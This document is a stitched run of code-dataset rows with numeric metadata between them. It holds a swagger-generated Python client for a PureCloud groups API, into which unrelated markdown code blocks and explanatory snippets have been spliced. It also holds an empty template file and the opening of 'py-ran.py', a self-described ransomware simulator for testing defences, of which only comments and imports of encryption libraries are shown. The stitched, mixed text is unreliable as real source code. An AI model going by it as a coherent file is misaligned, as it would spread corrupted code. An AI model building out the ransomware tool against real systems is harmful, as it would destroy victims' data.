| 58.21393 | 353 | 0.688702 | 5,735 | 46,804 | 5.439058 | 0.046382 | 0.065592 | 0.063957 | 0.029846 | 0.941365 | 0.930561 | 0.926426 | 0.917321 | 0.915398 | 0.904818 | 0 | 0.004337 | 0.22169 | 46,804 | 803 | 354 | 58.286426 | 0.85157 | 0.436288 | 0 | 0.802273 | 1 | 0 | 0.16539 | 0.084404 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163636 | false | 0.002273 | 0.015909 | 0 | 0.277273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
# coding: utf-8
"""
GroupsApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class GroupsApi(object):
"""
NOTE: This class is auto-generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def delete_group(self, group_id, **kwargs):
"""
Delete group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `delete_group`")
resource_path = '/api/v2/groups/{groupId}'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
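# Every generated method in this class validates its keyword arguments the same
# way: snapshot `locals()`, reject unexpected keys with TypeError, then check
# required parameters before building the request. A standalone sketch of that
# pattern in modern Python (the method and parameter names are illustrative,
# not part of the PureCloud SDK):

```python
def delete_resource(resource_id, **kwargs):
    all_params = ['resource_id', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything not declared above --
    # the same guard the generated methods build with iteritems().
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_resource" % key
            )
        params[key] = val
    del params['kwargs']
    # Required-parameter check mirrors the generated ValueError guard.
    if params.get('resource_id') is None:
        raise ValueError("Missing the required parameter `resource_id`")
    return {'id': params['resource_id'], 'callback': params.get('callback')}
```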
def delete_group_members(self, group_id, ids, **kwargs):
"""
Remove members
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_members(group_id, ids, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:param str ids: Comma separated list of userIds to remove (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id', 'ids']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group_members" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `delete_group_members`")
# verify the required parameter 'ids' is set
if ('ids' not in params) or (params['ids'] is None):
raise ValueError("Missing the required parameter `ids` when calling `delete_group_members`")
resource_path = '/api/v2/groups/{groupId}/members'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
if 'ids' in params:
query_params['ids'] = params['ids']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_fieldconfig(self, type, **kwargs):
"""
Fetch field config for an entity type
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fieldconfig(type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str type: Field type (required)
:return: FieldConfig
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['type']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fieldconfig" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'type' is set
if ('type' not in params) or (params['type'] is None):
raise ValueError("Missing the required parameter `type` when calling `get_fieldconfig`")
resource_path = '/api/v2/fieldconfig'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'type' in params:
query_params['type'] = params['type']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FieldConfig',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_group(self, group_id, **kwargs):
"""
Get group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_group(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `get_group`")
resource_path = '/api/v2/groups/{groupId}'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Group',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_group_individuals(self, group_id, **kwargs):
"""
Get all individuals associated with the group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_group_individuals(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:return: UserEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_group_individuals" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `get_group_individuals`")
resource_path = '/api/v2/groups/{groupId}/individuals'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_group_members(self, group_id, **kwargs):
"""
Get group members, includes individuals, owners, and dynamically included people
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_group_members(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:param int page_size: Page size
:param int page_number: Page number
:param str sort_order: Ascending or descending sort order
:param list[str] expand: Which fields, if any, to expand
:return: UserEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id', 'page_size', 'page_number', 'sort_order', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_group_members" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `get_group_members`")
resource_path = '/api/v2/groups/{groupId}/members'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
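# `get_group_members` accepts `page_size` and `page_number` query parameters, so
# callers typically loop until the listing is exhausted. A hedged, self-contained
# sketch of that loop: `get_page` stands in for a bound call such as
# api.get_group_members(group_id, ...), and the dict keys 'entities' and
# 'page_count' are assumptions modeled on PureCloud listing conventions (the real
# SDK returns objects with attributes, not dicts):

```python
def fetch_all_members(get_page, page_size=25):
    """Collect every entity from a paged listing endpoint."""
    members, page_number = [], 1
    while True:
        page = get_page(page_size=page_size, page_number=page_number)
        members.extend(page['entities'])
        if page_number >= page['page_count']:
            return members
        page_number += 1


def fake_endpoint(page_size, page_number):
    # Tiny in-memory stand-in for the real API call.
    data = list(range(5))
    start = page_size * (page_number - 1)
    return {'entities': data[start:start + page_size],
            'page_count': -(-len(data) // page_size)}  # ceil division


all_members = fetch_all_members(fake_endpoint, page_size=2)
```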
def get_group_profile(self, group_id, **kwargs):
"""
Get group profile
This API is deprecated. Use /api/v2/groups instead.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_group_profile(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: groupId (required)
:param str fields: Comma-separated fields to return. Allowable values can be found by querying /api/v2/fieldconfig?type=group and using the key for the elements returned by the fieldList.
:return: GroupProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id', 'fields']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_group_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `get_group_profile`")
resource_path = '/api/v2/groups/{groupId}/profile'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
if 'fields' in params:
query_params['fields'] = params['fields']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupProfile',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_groups(self, **kwargs):
"""
Get a group list
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_groups(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int page_size: Page size
:param int page_number: Page number
:param list[str] id: id
:param list[str] jabber_id: A list of jabberIds to fetch by bulk (cannot be used with the \"id\" parameter)
:param str sort_order: Ascending or descending sort order
:return: GroupEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page_number', 'id', 'jabber_id', 'sort_order']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_groups" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/groups'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'id' in params:
query_params['id'] = params['id']
if 'jabber_id' in params:
query_params['jabberId'] = params['jabber_id']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_groups_search(self, q64, **kwargs):
"""
Search groups using the q64 value returned from a previous search
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_groups_search(q64, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q64: q64 (required)
:param list[str] expand: expand
:return: GroupsSearchResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['q64', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_groups_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'q64' is set
if ('q64' not in params) or (params['q64'] is None):
raise ValueError("Missing the required parameter `q64` when calling `get_groups_search`")
resource_path = '/api/v2/groups/search'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'q64' in params:
query_params['q64'] = params['q64']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupsSearchResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_profiles_groups(self, **kwargs):
"""
Get group profile listing
This API is deprecated. Use /api/v2/groups instead.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_profiles_groups(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int page_size: Page size
:param int page_number: Page number
:param list[str] id: id
:param str sort_order: Ascending or descending sort order
:return: GroupProfileEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page_number', 'id', 'sort_order']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_profiles_groups" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/profiles/groups'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'id' in params:
query_params['id'] = params['id']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupProfileEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_group_members(self, group_id, body, **kwargs):
"""
Add members
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_group_members(group_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:param GroupMembersUpdate body: Add members (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_group_members" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `post_group_members`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_group_members`")
resource_path = '/api/v2/groups/{groupId}/members'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_groups(self, body, **kwargs):
"""
Create a group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_groups(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param GroupCreate body: Group (required)
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_groups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_groups`")
resource_path = '/api/v2/groups'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Group',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
    def post_groups_search(self, body, **kwargs):
        """
        Search groups
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.post_groups_search(body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param GroupSearchRequest body: Search request options (required)
        :return: GroupsSearchResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body']
        all_params.append('callback')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_groups_search" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `post_groups_search`")

        resource_path = '/api/v2/groups/search'.replace('{format}', 'json')
        path_params = {}

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'POST',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='GroupsSearchResponse',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response
    def put_group(self, group_id, **kwargs):
        """
        Update group
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.put_group(group_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str group_id: Group ID (required)
        :param GroupUpdate body: Group
        :return: Group
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['group_id', 'body']
        all_params.append('callback')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method put_group" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'group_id' is set
        if ('group_id' not in params) or (params['group_id'] is None):
            raise ValueError("Missing the required parameter `group_id` when calling `put_group`")

        resource_path = '/api/v2/groups/{groupId}'.replace('{format}', 'json')
        path_params = {}
        if 'group_id' in params:
            path_params['groupId'] = params['group_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'PUT',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='Group',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response
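The docstrings above all describe the same convention: passing `callback=` makes `call_api` run the request on a worker thread, invoke the callback with the response, and return the thread immediately. A minimal sketch of that pattern with stdlib threading (the names `call_api_async` and `do_request` are illustrative, not the SDK's internals):

```python
import threading

def call_api_async(do_request, callback):
    # Run the request on a worker thread and hand the result to the
    # callback, mirroring the callback=... convention in the methods above.
    def worker():
        callback(do_request())
    t = threading.Thread(target=worker)
    t.start()
    return t  # the caller may join() it, like the returned "request thread"

results = []
t = call_api_async(lambda: {"id": "group-1"}, results.append)
t.join()
print(results)  # [{'id': 'group-1'}]
```

Calling code that needs the result synchronously can simply `join()` the returned thread before reading it, which is why the docstrings say the method "returns the request thread" in asynchronous mode.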
| 37.450337 | 195 | 0.533636 | 4,367 | 44,491 | 5.252805 | 0.05885 | 0.026549 | 0.025502 | 0.023192 | 0.8901 | 0.878591 | 0.870962 | 0.870962 | 0.862854 | 0.861023 | 0 | 0.001961 | 0.381156 | 44,491 | 1,187 | 196 | 37.481887 | 0.831184 | 0.259401 | 0 | 0.836013 | 0 | 0 | 0.165067 | 0.013423 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024116 | false | 0 | 0.011254 | 0 | 0.059486 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2a017eb452b5c36599559fb12fde0d2833461422 | 85 | py | Python | __template__.py | brianjpetersen/tiny_id | cf14c6626ea5e0944298838d4c5108e6eaafa974 | [
"MIT"
] | null | null | null | __template__.py | brianjpetersen/tiny_id | cf14c6626ea5e0944298838d4c5108e6eaafa974 | [
"MIT"
] | 1 | 2015-10-14T12:44:28.000Z | 2015-10-14T12:44:28.000Z | __template__.py | brianjpetersen/tiny_id | cf14c6626ea5e0944298838d4c5108e6eaafa974 | [
"MIT"
] | null | null | null | # standard libraries
pass
# third party libraries
pass
# first party libraries
pass
| 10.625 | 23 | 0.788235 | 11 | 85 | 6.090909 | 0.545455 | 0.58209 | 0.537313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 85 | 7 | 24 | 12.142857 | 0.957143 | 0.729412 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
2a5741b45ddce161e2eac904de3a7a6be66eb4ab | 70,752 | py | Python | py-ran.py | bschroed96/Py-Ran | 3ee5d04fd2e803ff3430396574227dc2c3af98ec | [
"MIT"
] | null | null | null | py-ran.py | bschroed96/Py-Ran | 3ee5d04fd2e803ff3430396574227dc2c3af98ec | [
"MIT"
] | null | null | null | py-ran.py | bschroed96/Py-Ran | 3ee5d04fd2e803ff3430396574227dc2c3af98ec | [
"MIT"
] | null | null | null | # coded by zer0_p1k4chu
# A simple ransomware simulator for blue/red teams to test their defenses against ransomware. Purely for educational purposes.
# The author is not responsible for any damage caused by using this tool.
#!/usr/bin/python3
# import argparse
import os
import sys
import base64
import pyAesCrypt
import random
import string
# import PySimpleGUI as sg
import requests
import pgpy
from Cryptodome.Cipher import AES
from Cryptodome.Random import get_random_bytes
# parser = argparse.ArgumentParser()
# parser.add_argument("--dir",help="Location of the Folder you want to simulate")
# parser.add_argument("--mode",help="Accepts encrypt or decrypt arguments.")
